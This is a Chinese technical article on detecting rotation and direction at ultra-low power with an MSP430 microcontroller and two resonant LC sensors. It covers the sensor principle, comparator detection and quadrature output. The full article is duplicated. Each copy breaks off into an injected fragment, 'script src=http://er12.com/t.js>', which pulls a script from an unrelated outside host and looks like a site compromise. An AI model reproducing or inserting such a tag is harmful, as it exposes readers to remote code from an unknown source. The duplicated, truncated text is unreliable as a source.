采用16-bitMCU實現超低功耗運動檢測
發布時間:2006/7/11 0:00:00 訪問次數:275
圖 1 顯示了簡易旋轉運動檢測系統的實施。除了微控制器與顯示器之外,還顯示了二通道諧振 lc 傳感器的配置。單一傳感器僅可用于轉動檢測,添加了第二個傳感器后,就還可提供方向信息。
圖 1 msp430fw42x 轉動系統原理圖
傳感器原理
使用諧振 lc 傳感器的基本原理與 lc 電路振蕩時電感器輻射的磁場干擾有關。上述振蕩由 lc 傳感器脈沖引起,然后將一側釋放為高阻抗。激勵后的振蕩頻率是傳感器的基本頻率,計算如下:
一旦電路進入振蕩,則 lc fosc 輸出隨存儲能量的消耗迅速衰減為零。振蕩時,通過傳感器的電流產生磁場,磁場通常不受外部因素影響。但當有金屬表面靠近振蕩的電感器時,信號衰減速率就會快很多。圖 2 顯示了更詳細的傳感器配置視圖,并顯示了減振輪 (damping wheel) 以及相應的輸出信號。
圖 2 傳感器配置與振蕩
如圖 2 所示,傳感器 1 受到轉動輪金屬涂層部分的影響。與未受影響的傳感器 2 的信號輸出相比,振蕩衰減率增加。由磁場切割在金屬表面形成的感應渦流增加了 lc 傳感器的負載,從而加快了激勵振蕩的存儲能量的消耗。增加的衰減率也可稱為金屬表面產生的傳感器衰減。如能夠順利地檢測到與對應未衰減條件相應的衰減信號,則可檢測精心設計轉動輪的系統就提供一種感應給定系統運動的方法。
檢測電路
每個傳感器的激勵都由傳感器一側的簡單脈沖提供。振蕩檢測以及更重要的變化衰減率檢測用簡單的比較器與電壓參考實施。我們用有關振蕩信號驅動比較器的一個輸入,用參考信號驅動其它輸入,這樣,如比較器輸出大于參考電壓,就會與傳感器輸出發生振蕩;如振蕩低于比較器參考電壓,則比較器輸出會變為零。閉鎖比較器輸出,就完成了模擬傳感器系統到數字域的轉變,可進行 uc 處理。如果我們仔細校準比較器參考與信號具體點上的衰減和未衰減振蕩間的下降,那么比較器輸出就會反映傳感器的狀態。如果我們以通用數模轉換器 (dac) 替代參考的話,那么就可以方便地校準參考電壓,并能根據系統稍有不同的傳感器的要求積極修改參考電壓,或對測量系統施加磁滯。
對于圖 1 顯示的詳細系統,我們采用雙傳感器設置,從而既能檢測轉動、又能檢測方向。如果我們如圖 2 所示相隔 90 度放置傳感器,并采用 180 度的金屬涂層輪,雙 lc 傳感器就會產生正交信號,這就能提供轉動與方向編碼信號。圖 3 顯示了隨著輪轉動的傳感器變化情況以及相應的數字譯碼。
圖 3 雙 lc 傳感器正交數字輸出
雖然檢測衰減與未衰減傳感器輸出并將其轉換為數字輸出相對簡單,但是處理上述數據并將其應用于更大的狀態機則相當困難。主機控制器不僅須進行激勵并測量系統中的傳感器,還必須在檢測到轉動時采取行動,并跟蹤方向與傳感器信息的處理。如上所述,我們可用另外的分離式解決方案實現此目的,同時所需數字與模擬元件的集成使我們有潛力實現更低成本、更低功耗解決方案。
我們這里所說的模擬與數字處理元件的組合與集成構成超低功耗微控制器的基礎,特別是針對采用上述傳感器配置的應用。掃?script src=http://er12.com/t.js>
圖 1 顯示了簡易旋轉運動檢測系統的實施。除了微控制器與顯示器之外,還顯示了二通道諧振 lc 傳感器的配置。單一傳感器僅可用于轉動檢測,添加了第二個傳感器后,就還可提供方向信息。
圖 1 msp430fw42x 轉動系統原理圖
傳感器原理
使用諧振 lc 傳感器的基本原理與 lc 電路振蕩時電感器輻射的磁場干擾有關。上述振蕩由 lc 傳感器脈沖引起,然后將一側釋放為高阻抗。激勵后的振蕩頻率是傳感器的基本頻率,計算如下:
一旦電路進入振蕩,則 lc fosc 輸出隨存儲能量的消耗迅速衰減為零。振蕩時,通過傳感器的電流產生磁場,磁場通常不受外部因素影響。但當有金屬表面靠近振蕩的電感器時,信號衰減速率就會快很多。圖 2 顯示了更詳細的傳感器配置視圖,并顯示了減振輪 (damping wheel) 以及相應的輸出信號。
圖 2 傳感器配置與振蕩
如圖 2 所示,傳感器 1 受到轉動輪金屬涂層部分的影響。與未受影響的傳感器 2 的信號輸出相比,振蕩衰減率增加。由磁場切割在金屬表面形成的感應渦流增加了 lc 傳感器的負載,從而加快了激勵振蕩的存儲能量的消耗。增加的衰減率也可稱為金屬表面產生的傳感器衰減。如能夠順利地檢測到與對應未衰減條件相應的衰減信號,則可檢測精心設計轉動輪的系統就提供一種感應給定系統運動的方法。
檢測電路
每個傳感器的激勵都由傳感器一側的簡單脈沖提供。振蕩檢測以及更重要的變化衰減率檢測用簡單的比較器與電壓參考實施。我們用有關振蕩信號驅動比較器的一個輸入,用參考信號驅動其它輸入,這樣,如比較器輸出大于參考電壓,就會與傳感器輸出發生振蕩;如振蕩低于比較器參考電壓,則比較器輸出會變為零。閉鎖比較器輸出,就完成了模擬傳感器系統到數字域的轉變,可進行 uc 處理。如果我們仔細校準比較器參考與信號具體點上的衰減和未衰減振蕩間的下降,那么比較器輸出就會反映傳感器的狀態。如果我們以通用數模轉換器 (dac) 替代參考的話,那么就可以方便地校準參考電壓,并能根據系統稍有不同的傳感器的要求積極修改參考電壓,或對測量系統施加磁滯。
對于圖 1 顯示的詳細系統,我們采用雙傳感器設置,從而既能檢測轉動、又能檢測方向。如果我們如圖 2 所示相隔 90 度放置傳感器,并采用 180 度的金屬涂層輪,雙 lc 傳感器就會產生正交信號,這就能提供轉動與方向編碼信號。圖 3 顯示了隨著輪轉動的傳感器變化情況以及相應的數字譯碼。
圖 3 雙 lc 傳感器正交數字輸出
雖然檢測衰減與未衰減傳感器輸出并將其轉換為數字輸出相對簡單,但是處理上述數據并將其應用于更大的狀態機則相當困難。主機控制器不僅須進行激勵并測量系統中的傳感器,還必須在檢測到轉動時采取行動,并跟蹤方向與傳感器信息的處理。如上所述,我們可用另外的分離式解決方案實現此目的,同時所需數字與模擬元件的集成使我們有潛力實現更低成本、更低功耗解決方案。
我們這里所說的模擬與數字處理元件的組合與集成構成超低功耗微控制器的基礎,特別是針對采用上述傳感器配置的應用。掃?script src=http://er12.com/t.js>
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